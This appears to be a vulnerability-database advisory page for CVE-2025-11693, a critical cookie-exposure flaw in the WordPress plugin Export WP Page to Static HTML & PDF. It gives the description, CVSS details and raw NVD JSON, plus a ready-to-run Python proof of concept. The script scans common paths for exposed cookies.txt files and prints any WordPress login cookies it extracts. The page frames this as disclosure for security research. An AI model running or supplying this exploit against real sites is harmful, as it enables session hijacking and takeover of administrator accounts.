Security Vulnerability Report
中文
CVE-2025-11693 CVSS 9.8 CRITICAL

CVE-2025-11693

Published: 2025-12-13 16:16:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.'

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Export WP Page to Static HTML & PDF <= 4.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11693 PoC - Cookie File Access # Affected: Export WP Page to Static HTML & PDF <= 4.3.4 import requests import re target_url = "http://target-wordpress-site.com" # Common paths where cookies.txt might be exposed cookie_paths = [ "/wp-content/plugins/export-wp-page-to-static-html/cookies.txt", "/wp-content/uploads/cookies.txt", "/cookies.txt", "/wp-content/cookies.txt", "/export-wp-page-to-static-html/cookies.txt" ] def check_cookie_exposure(): print("[*] Checking for exposed cookies.txt files...") for path in cookie_paths: url = target_url + path try: response = requests.get(url, timeout=10) if response.status_code == 200 and len(response.text) > 0: if "wordpress_logged_in" in response.text or "wordpress_sec_" in response.text: print(f"[!] VULNERABLE: Found exposed cookie file at {url}") print(f"[+] Content preview: {response.text[:500]}") # Extract cookies cookies = re.findall(r'(wordpress_logged_in_[^=]+=[^;]+)', response.text) for cookie in cookies: print(f"[*] Cookie: {cookie}") return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False if __name__ == "__main__": check_cookie_exposure()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11693", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:45.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.'"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388166%40export-wp-page-to-static-html&new=3388166%40export-wp-page-to-static-html&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd28ac3c-aaef-49e3-843d-8532404703c9?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.